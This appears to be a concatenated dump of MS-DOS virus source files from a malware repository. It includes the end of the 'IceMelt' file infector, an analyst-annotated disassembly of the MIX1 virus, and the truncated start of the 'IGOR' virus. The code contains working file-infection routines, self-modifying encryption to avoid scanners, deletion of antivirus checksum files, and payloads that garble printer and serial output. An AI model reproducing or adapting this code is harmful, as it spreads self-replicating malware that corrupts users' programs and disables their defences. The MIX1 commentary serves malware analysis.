;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Crypts portion of virus
;
crypt_res:
xor bp,bp
crypt:
lea si,c_start
add si,bp
mov cx,(offset c_end-offset c_start)
add byte ptr cs:xor_op[bp],10h ; self modifying code...
int 3 ; fix prefetch
l1:
db 2Eh
xor_op db 70h,34h ; tbscan won't flag this bitch
xor_val db 0
inc si
loop l1
sub byte ptr cs:xor_op[bp],10h ; unmodify code
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Infection routine - called from INT 21h handler.
; DS:DX=fname
;
infect_file:
push dx
pop si
push ds
xor ax,ax ; null ES
mov es,ax
lds ax,es:[24h*4] ; get INT 24h vector
mov cs:old_24_off,ax ; save it
mov cs:old_24_seg,ds
mov es:[24h*4+2],cs ; install our handler
mov es:[24h*4],offset new_24
pop ds
push es ; we'll need it later
push cs
pop es
mov ax,4300h ; get phile attribute
int 21h
mov ax,4301h ; null attribs
push ax cx ; save AX-call/CX-attrib
xor cx,cx
int 21h
mov ax,3d02h ; open the file
int 21h
jc dont_do
mov bx,ax ; get handle
push cs
pop ds
call kill_chklst
mov ah,3fh ; Read first bytes of file
mov cx,20h
lea dx,org_bytes
int 21h
cmp byte ptr org_bytes,'M' ; single byte avoids heuristic flag
jz do_exe
cmp byte ptr org_bytes+3,0
jz close
mov is_exe,0
mov ax,5700h ; get time/date
int 21h
push cx dx
call offset_end
push ax ; AX=end of file
lea si,start ; DS:SI=start of code to encrypt
mov di,virus_size ; ES:DI=address for decryptor/
push di ; encrypted code. (at heap)
mov cx,virus_size ; CX=virus size
mov dx,ax ; DX=EOF offset
add dx,100h ; DX=offset decryptor will run from
mov al,00000001b ; no garbage, no CS:
call _vice ; call engine!
pop dx
mov ah,40h
int 21h
call offset_zero
pop ax ; restore COM file size
sub ax,3 ; calculate jmp offset
mov word ptr new_jmp+1,ax
lea dx,new_jmp
mov cx,4
mov ah,40h
int 21h
pop dx cx ; pop date/time
mov ax,5701h ; restore the mother fuckers
int 21h
close:
pop cx ax ; restore attrib
int 21h
mov ah,3eh
int 21h
dont_do:
pop es ; ES=0
lds ax,dword ptr old_24_off ; restore shitty DOS error handler
mov es:[24h*4],ax
mov es:[24h*4+2],ds
ret
do_exe:
cmp word ptr exe_header[12h],0 ; is checksum (in hdr) 0?
jnz close
cmp byte ptr exe_header[18h],52h ; pklite'd?
jz exe_ok
cmp byte ptr exe_header[18h],40h ; don't infect new format exe
jge close
exe_ok:
push bx
mov ah,2ch ; grab a random number
int 21h
mov word ptr exe_header[12h],dx ; mark that it's us
mov is_exe,1
les ax,dword ptr exe_header+14h ; Save old entry point
mov word ptr ds:exe_jump, ax
mov word ptr ds:exe_jump+2, es
push cs
pop es
call offset_end
push dx ax ; save file size DX:AX
mov bx, word ptr exe_header+8h ; calc. new entry point
mov cl,4 ; *16
shl bx,cl ; ^by shifting one byte
sub ax,bx ; get actual file size-header
sbb dx,0
mov cx,10h ; divide AX/CX rDX
div cx
mov word ptr exe_header+14h,dx
mov word ptr exe_header+16h,ax
mov rel_off,dx
pop ax ; AX:DX file size
pop dx
pop bx
mov cx,virus_size+10h ; calc. new size
adc ax,cx
mov cl,9 ; calc new alloc (512)
push ax
shr ax,cl
ror dx,cl
stc
adc dx,ax
pop ax ; ax=size+virus
and ah,1
mov word ptr exe_header+4h,dx
mov word ptr exe_header+2h,ax
lea si,start ; DS:SI=start of code to encrypt
mov di,virus_size ; ES:DI=address for decryptor and
push di ; encrypted code (at heap)
mov cx,virus_size ; CX=virus size
mov dx,rel_off ; DX=offset decryptor will run from
mov al,00000000b ; no garbage, use CS:
call _vice ; call engine!
pop dx
mov ah,40h
int 21h
call offset_zero
mov cx,18h ; write fiXed header
lea dx,exe_header
mov ah,40h
int 21h
jmp close
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; set file ptr
offset_zero: ; self explanitory
xor al,al
jmp set_fp
offset_end:
mov al,02h
set_fp:
mov ah,42h
xor cx,cx
xor dx,dx
int 21h
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Kill those darned MSAV and CPAV filez..
;
kill_chklst:
mov di,2 ; counter for loop
lea dx,first_2die ; first fname to kill
kill_loop:
mov ax,4301h ; reset attribs
xor cx,cx
int 21h
mov ah,41h ; delete phile
int 21h
lea dx,last_2die ; second fname to kill
dec di
jnz kill_loop
ret
first_2die db 'CHKLIST.MS',0 ; MSAV shitty checksum
last_2die db 'CHKLIST.CPS',0 ; CPAV shitty checksum
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; new 21h
new21:
pushf
cmp ax,signal ; be it us?
jnz not_us ; richtig..
cmp dx,vsafe_word
jnz not_us
cmp bl,special
jnz not_us
xor si,si
mov di,4559h
jmp jmp_org
not_us:
cmp cs:activate,0 ; time to activate?
jz nchk
cmp ah,40h ; write to phile?
jnz jmp_org
lea dx,credits ; phuck up address..
push cs
pop ds
nchk: cmp ax,4b00h ; execute phile?
jnz jmp_org
push ax bx cx di dx si ds es bp dx
mov ah,2ch ; grab random for cryptor
int 21h
mov byte ptr cs:xor_val,dl
pop dx
call crypt_res
call infect_file
call crypt_res
pop bp es ds si dx di cx bx ax
jmp_org:
popf
db 0eah ; jump far XXXX:XXXX
old21 dd 0
new_24: ; critical error handler
mov al,3 ; prompts suck, return fail
iret
activate db 0
txt_ptr dw offset credits
credits db '[IceMelt, by ûirogen]'
credit_end:
new_jmp db 0E9h,0,0,0 ; jmp XXXX,0
rel_off dw 0
exe_header:
org_bytes db 0CDh,20h,0,0 ; original COM bytes | exe hdr
heap:
db 16h dup(0) ; remaining exe header space
old_24_off dw 0 ; old int24h vector
old_24_seg dw 0
vend:
cseg ends
end start

857
MSDOS/Virus.MSDOS.Unknown.icemix1.asm Normal file
View File

@ -0,0 +1,857 @@
; THE MIX1 virus
;
; It was first detected in Israel in August '89.
;
; Disassembly done Sept. 24-25 '89.
;
; The author of this program is unknown, but it is clearly a
; modification of the "Icelandic" virus, with considerable
; additions
;
; All comments in this file were added by Fridrik Skulason,
; University of Iceland/Computing Services.
;
; INTERNET: frisk@rhi.hi.is
; UUCP: ...mcvax!hafro!rhi!frisk
; BIX: FRISK
;
; To anyone who obtains this file - please be careful with it, I
; would not like to see this virus be distributed too much.
;
; A short description of the virus:
;
; It only infects .EXE files. Infected files grow by ... to ... bytes.
; The virus attaches itself to the end of the programs it infects.
;
; When an infected file is run, the virus copies itself to top of
; free memory, and modifies the memory blocks, in order to hide from
; memory mapping programs. Some programs may overwrite this area,
; causing the computer to crash.
;
; The virus will hook INT 21H and when function 4B (EXEC) is called
; it sometimes will infect the program being run. It will check every
; tenth program that is run for infection, and if it is not already
; infected, it will be.
;
; The virus will remove the Read-Only attribute before trying to
; infect programs.
;
; Infected files can be easily recognized, since they always end in
; "MIX1"
;
; To check for system infection, a byte at 0:33C is used - if it
; contains 77 the virus is installed in memory.
;
;
VIRSIZ EQU 128
;
; This is the original program, just used so this file, when
; assembled, will produce an active copy.
;
_TEXT1 SEGMENT PARA PUBLIC
_START DB 0b4H,09H
PUSH CS
POP DS
MOV DX,OFFSET STRING
INT 21H
MOV AX,4C00H
INT 21H
STRING DB "Hello world!",0dh,0ah,"$"
_TEXT1 ENDS
CODE SEGMENT PARA PUBLIC 'CODE'
ASSUME CS:CODE,DS:NOTHING,SS:NOTHING,ES:NOTHING
;
; The virus is basically divided in the following parts.
;
; 1. The main program - run when an infected program is run.
; It will check if the system is already infected, and if not
; it will install the virus.
;
; 2. The new INT 17 handler. All outgoing characters will be garbled.
;
; 3. The new INT 14 handler. All outgoing characters will be garbled.
;
; 4. The new INT 8 handler.
;
; 5. The new INT 9 handler. Disables the Num-Lock key
;
; 6. The new INT 21 handler. It will look for EXEC calls, and
; (sometimes) infect the program being run.
;
; Parts 1 and 6 are almost identical to the Icelandic-1 version
;
; This is a fake MCB
;
DB 'Z',00,00,VIRSIZ,0,0,0,0,0,0,0,0,0,0,0,0
VIRUS PROC FAR
;
; The virus starts by pushing the original start address on the stack,
; so it can transfer control there when finished.
;
LABEL: DEC SP ; This used to be SUB SP,4
DEC SP
NOP
DEC SP
DEC SP
PUSH BP
MOV BP,SP
NOP ; added
PUSH AX
NOP ; added
MOV AX,ES
;
; Put the the original CS on the stack. The ADD AX,data instruction
; is modified by the virus when it infects other programs.
;
DB 05H
ORG_CS DW 0010H
MOV [BP+4],AX
;
; Put the the original IP on the stack. This MOV [BP+2],data instruction
; is modified by the virus when it infects other programs.
;
DB 0C7H,46H,02H
ORG_IP DW 0000H
;
; Save all registers that are modified.
;
PUSH ES
PUSH DS
PUSH BX
PUSH CX
PUSH SI
PUSH DI
;
; Check if already installed. Quit if so.
;
MOV AX,0 ; Was: XOR AX,AX
MOV ES,AX
CMP ES:[33CH],BYTE PTR 077H
JNE L1
;
; Restore all registers and return to the original program.
;
EXIT: POP DI
POP SI
POP CX
POP BX
POP DS
POP ES
POP AX
POP BP
RET
;
; The virus tries to hide from detection by modifying the memory block it
; uses, so it seems to be a block that belongs to the operating system.
;
; It looks rather weird, but it seems to work.
;
L1: MOV AH,52H
INT 21H
MOV AX,ES:[BX-2]
MOV ES,AX
PUSH ES ; Two totally unnecessary instructions
POP AX ; added
ADD AX,ES:[0003]
INC AX
INC AX
MOV CS:[0001],AX
;
; Next, the virus modifies the memory block of the infected program.
; It is made smaller, and no longer the last block.
;
MOV BX,DS
DEC BX
PUSH BX ; Unnecessary addition
POP AX
MOV DS,BX
MOV AL,'M'
MOV DS:[0000],AL
MOV AX,DS:[0003]
SUB AX,VIRSIZ
MOV DS:[0003],AX
ADD BX,AX
INC BX
;
; Then the virus moves itself to the new block.
;
PUSH BX ; Was: MOV ES,BX
POP ES
MOV SI,0 ; Was: XOR SI,SI XOR DI,DI
MOV DI,SI
PUSH CS
POP DS
MOV CX,652H
CLD
REP MOVSB
;
; The virus then transfers control to the new copy of itself.
;
PUSH ES
MOV AX,OFFSET L3
PUSH AX
RET
;
; Zero some variables
;
L3: MOV BYTE PTR CS:[MIN60],0
NOP
MOV BYTE PTR CS:[MIN50],0
NOP
MOV WORD PTR CS:[TIMER],0
;
; The most nutty way to zero ES register that I have ever seen:
;
MOV BX,0FFFFH
ADD BX,3F3FH
MOV CL,0AH
SHL BX,CL
AND BX,CS:[CONST0]
MOV AX,BX
MOV ES,AX
;
; Set flag to confirm installation
;
MOV BYTE PTR ES:[33CH],77H
;
; Hook interrupt 21:
;
MOV AX,ES:[0084H]
MOV CS:[OLD21],AX
MOV AX,ES:[0086H]
MOV CS:[OLD21+2],AX
MOV AX,CS
MOV ES:[0086H],AX
MOV AX,OFFSET NEW21
MOV ES:[0084H],AX
;
; Hook interrupt 17:
;
MOV AX,ES:[005CH]
MOV CS:[OLD17],AX
MOV AX,ES:[005EH]
MOV CS:[OLD17+2],AX
MOV AX,CS
MOV ES:[005EH],AX
MOV AX,OFFSET NEW17
MOV ES:[005CH],AX
;
; Hook interrupt 14:
;
MOV AX,ES:[0050H]
MOV CS:[OLD17],AX
MOV AX,ES:[0052H]
MOV CS:[OLD14+2],AX
MOV AX,CS
MOV ES:[0052H],AX
MOV AX,OFFSET NEW14
MOV ES:[0050H],AX
;
;
;
CMP WORD PTR CS:[NOINF],5
JG HOOK9
JMP EXIT
;
; Hook interrupt 9
;
HOOK9: MOV AX,ES:[0024H]
MOV CS:[OLD9],AX
MOV AX,ES:[0026H]
MOV CS:[OLD9+2],AX
MOV AX,CS
MOV ES:[0026H],AX
MOV AX,OFFSET NEW9
MOV ES:[0024H],AX
;
; Hook interrupt 8
;
MOV AX,ES:[0020H]
MOV CS:[OLD8],AX
MOV AX,ES:[0022H]
MOV CS:[OLD8+2],AX
MOV AX,CS
MOV ES:[0022H],AX
MOV AX,OFFSET NEW8
MOV ES:[0020H],AX
JMP EXIT
;
; Video processing
;
VID: PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH DI
PUSH DS
PUSH ES
PUSH CS
POP DS
MOV AH,0FH
INT 10H
MOV AH,6
MUL AH
MOV BX,AX
MOV AX,DS:[BX+OFFSET VIDEOT]
MOV CX,DS:[BX+OFFSET VIDEOT+2]
MOV DX,DS:[BX+OFFSET VIDEOT+4]
MOV ES,DX
SHR CX,1
MOV DI,1
CMP AX,0
JNZ V1
V0: INC WORD PTR ES:[DI]
INC DI
INC DI
LOOP V0
JMP SHORT V2
NOP
V1: NOT WORD PTR ES:[DI]
INC DI
INC DI
LOOP V1
V2: POP ES
POP DS
POP DI
POP DX
POP CX
POP BX
POP AX
RET
;
; INT 9 replacement: Just fiddle around with the NUM-LOCK etc.
; This routine does not become active until 50 minutes after
; the execution of an infected program.
;
NEW9: PUSH AX
PUSH ES
CMP BYTE PTR CS:[MIN50],1
JNZ RETX1
XOR AX,AX
MOV ES,AX ; was xxxxxxxx
AND BYTE PTR ES:[417H],0BFH ; x0xxxxxx
OR BYTE PTR ES:[417H],20H ; x01xxxxx
TEST BYTE PTR ES:[417H],0CH
JZ RETX1
IN AL,60
CMP AL,53
JNZ RETX1
AND BYTE PTR ES:[417H],0F7H
;
; This seems to be an error - the virus uses a FAR call, which will
; probably cause the computer to crash.
;
DB 9AH
DW OFFSET VID,171CH
;
; This needs more checking.
;
RETX1: POP ES
POP AX
DB 0EAH
OLD9 DW 0,0
;
; New INT 14 routine - garble all outgoing characters
;
NEW14: CMP AH,1
JZ S1
DO14: DB 0EAH
OLD14 DW 0,0
S1: PUSH BX
XOR BX,BX
MOV BL,AL
ADD BX,OFFSET ERRTAB
MOV AL,CS:[BX] ; use old character as index into table
POP BX
JMP DO14
;
; New INT 8 routine
;
NEW8: PUSH DX
PUSH CX
PUSH BX
PUSH AX
CMP BYTE PTR CS:[MIN60],01 ; If counter >= 60 min.
JZ TT0 ; No need to check any more
INC WORD PTR CS:[TIMER] ; else increment timer
CMP WORD PTR CS:[TIMER],-10 ; 60 minutes ?
JZ TT1
CMP WORD PTR CS:[TIMER],54600 ; 50 minutes ?
JZ TT2
JMP TXEX
;
; 50 minutes after an infected program is run the flag is set.
;
TT2: MOV BYTE PTR CS:[MIN50],1
NOP
JMP TXEX
;
; 60 minutes after an infected program is run we start the ball bouncing.
;
TT1: MOV BYTE PTR CS:[MIN60],1
;
; Get current cursor position and save it
;
MOV AH,3
MOV BH,0
INT 10H
MOV CS:[SCRLINE],DH
MOV CS:[SCRCOL],DL
;
; Set cursor position
;
MOV AH,2
MOV BH,0
MOV DH,CS:[MYLINE]
MOV DL,CS:[MYCOL]
INT 10H
;
; Check what is there and store it
;
MOV AH,8
MOV BH,0
INT 10H
MOV CS:[ONSCREEN],AL
;
; Set cursor position back as it was before
;
MOV AH,2
MOV BH,0
MOV DH,CS:[SCRLINE]
MOV DL,CS:[SCRCOL]
INT 10H
;
; Get current video mode and store it
;
MOV AH,0FH
INT 10H
MOV CS:[VMODE],AH
;
; Exit interrupt routine
;
JMP TXEX
;
; Every time an INT 8 occurs, after the 60 min. have passed, we
; end up here:
;
; First get current cursor position
;
TT0: MOV AH,3
MOV BH,0
INT 10H
MOV CS:[SCRLINE],DH
MOV CS:[SCRCOL],DL
;
; Then set it to last position of ball.
;
MOV AH,2
MOV BH,0
MOV DH,CS:[MYLINE]
MOV DL,CS:[MYCOL]
INT 10H
;
; Write previous character there ...
;
MOV AH,0EH
MOV AL,CS:[ONSCREEN]
MOV BX,0
INT 10H
;
;
CMP BYTE PTR CS:[UPDOWN],0
JZ T2
;
;
DEC BYTE PTR CS:[MYLINE]
JMP SHORT T3
NOP
T2: INC BYTE PTR CS:[MYLINE]
T3: CMP BYTE PTR CS:[LEFTRIGHT],0
JZ T4
DEC BYTE PTR CS:[MYCOL]
JMP SHORT T5
NOP
T4: INC BYTE PTR CS:[MYCOL]
;
; Get current video mode
;
T5: MOV AH,0FH
INT 10H
MOV CS:[VMODE],AH
MOV AL,CS:[MAXLIN]
CMP CS:[MYLINE],AL ; bottom of screen ?
JNZ T6
;
; Reached bottom - now go upwards.
;
NOT BYTE PTR CS:[UPDOWN]
T6: CMP BYTE PTR CS:[MYLINE],0 ; reached the top ?
JNZ T7
;
; Reached top - now go downwards
;
NOT BYTE PTR CS:[UPDOWN]
T7: MOV AL,CS:[VMODE]
CMP CS:[MYCOL],AL
JNZ T8
NOT BYTE PTR CS:[LEFTRIGHT]
T8: CMP BYTE PTR CS:[MYCOL],0
JNZ T9
NOT BYTE PTR CS:[LEFTRIGHT]
;
; Set cursor position to new position of ball
;
T9: MOV AH,02
MOV BH,0
MOV DH,CS:[MYLINE]
MOV DL,CS:[MYCOL]
INT 10H
;
; Get what is there and store it.
;
MOV AH,8
MOV BH,0
INT 10H
MOV CS:[ONSCREEN],AL
;
; Write character (lower case o)
;
MOV AH,0EH
MOV AL,6FH
MOV BX,0
INT 10H
;
; And restore cursor position
;
MOV AH,02
MOV BH,0
MOV DH,CS:[SCRLINE]
MOV DL,CS:[SCRCOL]
INT 10H
;
; Restore registers and quit
;
TXEX: POP AX
POP BX
POP CX
POP DX
DB 0EAH
OLD8 DW 0,0
;
; New INT 17 routine. Garble all outgoing characters.
;
NEW17: CMP AH,0
JZ P0
DO17: DB 0EAH
OLD17 DW 0,0
P0: PUSH BX
XOR BX,BX
MOV BL,AL
ADD BX,OFFSET ERRTAB
MOV AL,CS:[BX]
POP BX
JMP DO17
;
; This is the INT 21 replacement. It only does something in the case
; of an EXEC call.
;
NEW21: CMP AH,4BH
JE L5
DO21: DB 0EAH
OLD21 DW 0,0
;
; The code to only infect every tenth program has been removed
;
L5: PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DS
;
; Search for the file name extension ...
;
MOV BX,DX
L6: INC BX
CMP BYTE PTR [BX],'.'
JE L8
CMP BYTE PTR [BX],0
JNE L6
;
; ... and quit unless it starts with "EX".
;
L7: POP DS
POP SI
POP DX
POP CX
POP BX
POP AX
JMP DO21
L8: INC BX
CMP WORD PTR [BX],5845H
JNE L7
;
; When an .EXE file is found, the virus starts by turning off
; the read-only attribute. The read-only attribute is not restored
; when the file has been infected.
;
MOV AX,4300H ; Get attribute
INT 21H
JC L7
MOV AX,4301H ; Set attribute
AND CX,0FEH
INT 21H
JC L7
;
; Next, the file is examined to see if it is already infected.
; The signature (4418 5F19) is stored in the last two words.
;
MOV AX,3D02H ; Open / write access
INT 21H
JC L7
MOV BX,AX ; file handle in BX
;
; This part of the code is new: Get date of file.
;
MOV AX,5700H
INT 21H
JC L9
MOV CS:[DATE1],DX
MOV CS:[DATE2],CX
;
PUSH CS ; now DS is no longer needed
POP DS
;
; The header of the file is read in at [ID+8]. The virus then
; modifies itself, according to the information stored in the
; header. (The original CS and IP addressed are stored).
;
MOV DX,OFFSET ID+8
MOV CX,1CH
MOV AH,3FH
INT 21H
JC L9
MOV AX,DS:ID[1CH]
MOV DS:[ORG_IP],AX
MOV AX,DS:ID[1EH]
ADD AX,10H
MOV DS:[ORG_CS],AX
;
; Next the read/write pointer is moved to the end of the file-4,
; and the last 4 bytes read. They are compared to the signature,
; and if equal nothing happens.
;
MOV AX,4202H
MOV CX,-1
MOV DX,-4
INT 21H
JC L9
ADD AX,4
MOV DS:[LEN_LO],AX
JNC L8A
INC DX
L8A: MOV DS:[LEN_HI],DX
;
; This part of the virus is new - check if it is below minimum length
;
CMP DX,0
JNE L8B
MOV CL,13
SHR AX,CL
CMP AX,0
JG L8B
JMP SHORT L9
NOP
L8B: MOV AH,3FH
MOV CX,4
MOV DX,OFFSET ID+4
INT 21H
JNC L11
L9: MOV AH,3EH
INT 21H
L10: JMP L7
;
; Compare to 4418,5F19
;
L11: MOV SI,OFFSET ID+4
MOV AX,[SI]
CMP AX,494DH
JNE L12
MOV AX,[SI+2]
CMP AX,3158H
JE L9
;
; The file is not infected, so the next thing the virus does is
; infecting it. First it is padded so the length becomes a multiple
; of 16 bytes. Tis is probably done so the virus code can start at a
; paragraph boundary.
;
L12: MOV AX,DS:[LEN_LO]
AND AX,0FH
JZ L13
MOV CX,16
SUB CX,AX
ADD DS:[LEN_LO],CX
JNC L12A
INC DS:[LEN_HI]
L12A: MOV AH,40H
INT 21H
JC L9
;
; Next the main body of the virus is written to the end.
;
L13: MOV DX,0 ; Was: XOR DX,DX
MOV CX,OFFSET ID + 4
MOV AH,40H
INT 21H
JC L9
;
; Next the .EXE file header is modified:
;
JMP SHORT F0 ; some unnecessary instructions
NOP
; First modify initial IP
;
F0: MOV AX,OFFSET LABEL
MOV DS:ID[1CH],AX
;
; Modify starting CS = Virus CS. It is computed as:
;
; (Original length of file+padding)/16 - Start of load module
;
MOV DX,DS:[LEN_HI]
MOV AX,DS:[LEN_LO]
MOV CL,CS:[CONST1] ; Modified a bit
SHR DX,CL
RCR AX,CL
SHR DX,CL
RCR AX,CL
SHR DX,CL
RCR AX,CL
SHR DX,CL
RCR AX,CL
SUB AX,DS:ID[10H]
MOV DS:ID[1EH],AX
;
; Modify length mod 512
;
ADD DS:[LEN_LO],OFFSET ID+4
JNC L14
INC DS:[LEN_HI]
L14: MOV AX,DS:[LEN_LO]
AND AX,511
MOV DS:ID[0AH],AX
;
; Modify number of blocks used
;
MOV DX,DS:[LEN_HI]
MOV AX,DS:[LEN_LO]
ADD AX,511
JNC L14A
INC DX
L14A: MOV AL,AH
MOV AH,DL
SHR AX,1
MOV DS:ID[0CH],AX
;
; Finally the modified header is written back to the start of the
; file.
;
QQQ: MOV AX,4200H
MOV CX,0 ; was XOR CX,CX
AND DX,CS:[CONST0] ; was XOR DX,DX
INT 21H
JC ENDIT
MOV AH,40H
MOV DX,OFFSET ID+8
MOV CX,1CH
INT 21H
;
; This part is new: Restore old date.
;
MOV DX,CS:[DATE1]
MOV CX,CS:[DATE2]
MOV AX,5701H
INT 21H
JC ENDIT
INC WORD PTR CS:[NOINF]
;
; Infection is finished - close the file and execute it
;
ENDIT: JMP L9
;
;
DW 0
VIDEOT: DW 0000H, 07D0H, 0B800H
DW 0000H, 07D0H, 0B800H
DW 0000H, 0FA0H, 0B800H
DW 0000H, 0FA0H, 0B800H
DW 0001H, 4000H, 0B800H
DW 0001H, 4000H, 0B800H
DW 0001H, 4000H, 0B800H
DW 0000H, 0FA0H, 0B000H
DW 0001H, 3E80H, 0B000H
DW 0001H, 7D00H, 0B000H
DW 0001H, 7D00H, 0B000H
DW 0002H, 0000H, 0000H
DW 0002H, 0000H, 0000H
DW 0001H, 7D00H, 0A000H
DW 0001H, 0FA00H, 0A000H
DW 0001H, 6D60H, 0A000H
DW 0002H, 0000H. 0000H
DW 0
ERRTAB DB 00H,01H,02H,03H,04H,05H,06H,07H,08H,09H,0BH,0AH,0CH,0DH,0EH,0FH
DB 10H,11H,12H,13H,14H,15H,16H,17H,18H,19H,1BH,1AH,1CH,1DH,1FH,1EH
DB 20H,21H,22H,23H,24H,25H,26H,27H,29H,28H,2AH,2DH,2CH,2BH,2EH,2FH
DB 30H,31H,32H,33H,34H,35H,36H,37H,38H,39H,3AH,3BH,3EH,3DH,3CH,3FH
DB 40H,42H,45H,43H,44H,41H,50H,47H,48H,59H,4AH,4BH,4CH,4DH,4EH,55H
DB 46H,51H,52H,53H,54H,4FH,56H,57H,58H,49H,5AH,5DH,5CH,5BH,5EH,5FH
DB 60H,65H,62H,73H,64H,61H,70H,67H,68H,65H,6AH,6BH,6CH,6DH,6EH,75H
DB 66H,71H,72H,63H,74H,6FH,76H,77H,78H,79H,7AH,7DH,7CH,7BH,7EH,7FH
DB 92H,81H,82H,83H,84H,85H,86H,8BH,9AH,89H,8AH,87H,8CH,8DH,8EH,8FH
DB 90H,99H,80H,93H,94H,95H,96H,97H,98H,91H,88H,9BH,9CH,9DH,9EH,9FH
DB 0A0H,0A1H,0A2H,0A3H,0A4H,0A5H,0A6H,0A7H,0A8H,0A9H,0BBH,0ABH,0ACH
DB 0B0H,0B1H,0B2H,0B3H,0B4H,0B5H,0B6H,0B7H,0B8H,0B9H,0BAH,0AAH,0D9H
DB 0C8H,0C1H,0C2H,0C3H,0C4H,0C5H,0C6H,0C7H,0C0H,0A9H,0CAH,0CBH,0CCH
DB 0D0H,0D1H,0D2H,0D3H,0D4H,0D5H,0D6H,0D7H,0D8H,0BCH,0DAH,0DBH,0DCH
DB 0E0H,0E1H,0E2H,0E3H,0E4H,0E5H,0E6H,0E7H,0E8H,0E9H,0EAH,0EBH,0ECH
DB 0F0H,0F1H,0F2H,0F3H,0F4H,0F5H,0F6H,0F7H,0F8H,0F9H,0FAH,0FBH,0FCH
CONST1 DB 1 ; Just the constant 1
CONST0 DW 0 ; The label says it all
MIN60 DB 0 ; Flag, set to 1 60 minutes after execution
MIN50 DB 0 ; Flag, set to 1 50 minutes after execution
VMODE DB 0 ; Video mode
MAXLIN DB 24
MYCOL DB 0 ; Position of ball on screen
MYLINE DB 0 ; ditto.
ONSCREEN DB ? ; Previous character on the screen
UPDOWN DB 0 ; Direction of ball (up or down)
LEFTRIGHT DB 0 ; Direction (left or right)
SCRCOL DB ?
SCRLINE DB ?
DATE1 DW ? ; Date of file
DATE2 DW ? ; ditto.
TIMER DW 0 ; Number of timer (INT 8) ticks
LEN_LO DW ?
LEN_HI DW ?
NOINF DW 0 ; Number of infections
ID LABEL WORD
DB "MIX1" ; The signature of the virus.
;
; A buffer, used for data from the file.
;
VIRUS ENDP
CODE ENDS
END LABEL
of the

536
MSDOS/Virus.MSDOS.Unknown.igor.asm Normal file
View File

@ -0,0 +1,536 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ IGOR ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 12-Jul-92 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: none ÛÛ
;ÛÛ (c) 1992 by Igor Ratzkopf - All Rights Reserved July R ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 16h
data_2e equ 469h ;*
data_3e equ 103h ;*
data_4e equ 1 ;*
data_5e equ 3 ;*
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
igor proc far
start::
jmp short $+3 ; delay for I/O
nop
call sub_1
igor endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
pop bp
sub bp,106h
push ax
push bx
push cx
push dx
push si
push di
push bp
push es
push ds
mov ax,7BCDh
int 21h ; ??INT Non-standard interrupt
cmp bx,7BCDh
je loc_4 ; Jump if equal
xor bx,bx ; Zero register
push cs
pop ds
mov cx,es
mov ax,3509h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov word ptr cs:data_11+2[bp],es
mov cs:data_11[bp],bx
mov ax,3521h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov word ptr cs:data_9+2[bp],es
mov cs:data_9[bp],bx
dec cx
mov es,cx
mov bx,es:data_5e
mov dx,3C3h
mov cl,4
shr dx,cl ; Shift w/zeros fill
add dx,4
mov cx,es
sub bx,dx
inc cx
mov es,cx
mov ah,4Ah
int 21h ; DOS Services ah=function 4Ah
; change memory allocation
; bx=bytes/16, es=mem segment
jc loc_4 ; Jump if carry Set
mov ah,48h ; 'H'
dec dx
mov bx,dx
int 21h ; DOS Services ah=function 48h
; allocate memory, bx=bytes/16
jc loc_4 ; Jump if carry Set
dec ax
mov es,ax
mov cx,8
mov es:data_4e,cx
sub ax,0Fh
mov di,data_3e
mov es,ax
mov si,bp
add si,103h
mov cx,3C3h
cld ; Clear direction
repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di]
mov ax,2521h
;* mov dx,offset loc_3 ;*
db 0BAh, 8Fh, 02h
push es
pop ds
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
mov ax,2509h
;* mov dx,offset loc_2 ;*
db 0BAh, 1Ah, 02h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
push cs
pop ds
loc_4::
cmp cs:data_25[bp],5A4Dh
je loc_5 ; Jump if equal
